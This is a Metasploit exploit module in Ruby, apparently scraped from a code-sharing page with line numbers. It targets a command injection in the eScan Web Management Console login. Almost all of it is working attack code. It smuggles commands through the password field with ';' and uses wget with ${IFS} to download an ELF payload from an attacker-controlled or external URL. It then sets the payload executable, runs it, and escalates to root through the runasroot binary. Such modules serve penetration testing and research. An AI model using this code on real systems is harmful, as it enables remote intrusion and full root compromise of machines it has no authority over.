Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::Remote::HttpServer::HTML
11
  include Msf::Exploit::EXE
12
  include Msf::Exploit::FileDropper
13

14
  def initialize(info={})
15
    super(update_info(info,
16
      'Name'           => "eScan Web Management Console Command Injection",
17
      'Description'    => %q{
18
        This module exploits a command injection vulnerability found in the eScan Web Management
19
        Console. The vulnerability exists while processing CheckPass login requests. An attacker
20
        with a valid username can use a malformed password to execute arbitrary commands. With
21
        mwconf privileges, the runasroot utility can be abused to get root privileges. This module
22
        has been tested successfully on eScan 5.5-2 on Ubuntu 12.04.
23
      },
24
      'License'        => MSF_LICENSE,
25
      'Author'         =>
26
        [
27
          'Joxean Koret', # Vulnerability Discovery and PoC
28
          'juan vazquez' # Metasploit module
29
        ],
30
      'References'     =>
31
        [
32
          [ 'URL', 'http://www.joxeankoret.com/download/breaking_av_software-pdf.tar.gz' ] # Syscan slides by Joxean
33
        ],
34
      'Payload'        =>
35
        {
36
          'BadChars'    => "", # Real bad chars when injecting: "|&)(!><'\"` ", cause of it we're avoiding ARCH_CMD
37
          'DisableNops' => true
38
        },
39
      'Arch'           => ARCH_X86,
40
      'Platform'       => 'linux',
41
      'Privileged'     => true,
42
      'Stance'         => Msf::Exploit::Stance::Aggressive,
43
      'Targets'        =>
44
        [
45
          ['eScan 5.5-2 / Linux', {}],
46
        ],
47
      'DisclosureDate' => '2014-04-04',
48
      'DefaultTarget'  => 0))
49

50
    register_options(
51
      [
52
        Opt::RPORT(10080),
53
        OptString.new('USERNAME', [ true, 'A valid eScan username' ]),
54
        OptString.new('TARGETURI', [true, 'The base path to the eScan Web Administration console', '/']),
55
        OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),
56
        OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
57
        OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),
58
        OptString.new('RUNASROOT', [ true, 'Path to the runasroot binary', '/opt/MicroWorld/sbin/runasroot' ]),
59
      ])
60
  end
61

62

63
  def check
64
    res = send_request_cgi({
65
      'method' => 'GET',
66
      'uri'    => normalize_uri(target_uri.path.to_s, 'index.php')
67
    })
68

69
    if res and res.code == 200 and res.body =~ /eScan WebAdmin/
70
      return Exploit::CheckCode::Detected
71
    end
72

73
    Exploit::CheckCode::Unknown
74
  end
75

76
  def cmd_exec(session, cmd)
77
    case session.type
78
    when /meterpreter/
79
      print_warning("Use a shell payload in order to get root!")
80
    when /shell/
81
      o = session.shell_command_token(cmd)
82
      o.chomp! if o
83
    end
84
    return "" if o.nil?
85
    return o
86
  end
87

88
  # Escalating privileges here because runasroot only can't be executed by
89
  # mwconf uid (196).
90
  def on_new_session(session)
91
    cmd_exec(session, "#{datastore['RUNASROOT'].shellescape} /bin/sh")
92
    super
93
  end
94

95
  def primer
96
    @payload_url = get_uri
97
    wget_payload
98
  end
99

100
  def on_request_uri(cli, request)
101
    print_status("Request: #{request.uri}")
102
    if request.uri =~ /#{Regexp.escape(get_resource)}/
103
      print_status("Sending payload...")
104
      send_response(cli, @pl)
105
    end
106
  end
107

108
  def autofilter
109
    true
110
  end
111

112
  def exploit
113
    @pl           = generate_payload_exe
114

115
    @payload_url  = ""
116

117
    if datastore['EXTURL'].blank?
118
      begin
119
        Timeout.timeout(datastore['HTTPDELAY']) {super}
120
      rescue Timeout::Error
121
      end
122
      exec_payload
123
    else
124
      @payload_url = datastore['EXTURL']
125
      wget_payload
126
      exec_payload
127
    end
128
  end
129

130
  # we execute in this way, instead of an ARCH_CMD
131
  # payload because real badchars are: |&)(!><'"`[space]
132
  def wget_payload
133
    @dropped_elf = rand_text_alpha(rand(5) + 3)
134
    command = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
135

136
    print_status("Downloading the payload to the target machine...")
137
    res = exec_command(command)
138
    if res && res.code == 302 && res.headers['Location'] && res.headers['Location'] =~ /index\.php\?err_msg=password/
139
      register_files_for_cleanup(File.join(datastore['WRITABLEDIR'], @dropped_elf))
140
    else
141
      fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")
142
    end
143
  end
144

145
  def exec_payload
146
    command = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)};"
147
    command << File.join(datastore['WRITABLEDIR'], @dropped_elf)
148

149
    print_status("Executing the payload...")
150
    exec_command(command, 1)
151
  end
152

153
  def exec_command(command, timeout=20)
154
    send_request_cgi({
155
      'method' => 'POST',
156
      'uri'    => normalize_uri(target_uri.path.to_s, 'login.php'),
157
      'vars_post' => {
158
        'uname' => datastore['USERNAME'],
159
        'pass' => ";#{command}",
160
        'product_name' => 'escan',
161
        'language' => 'English',
162
        'login' => 'Login'
163
      }
164
    }, timeout)
165
  end
166
end
167

168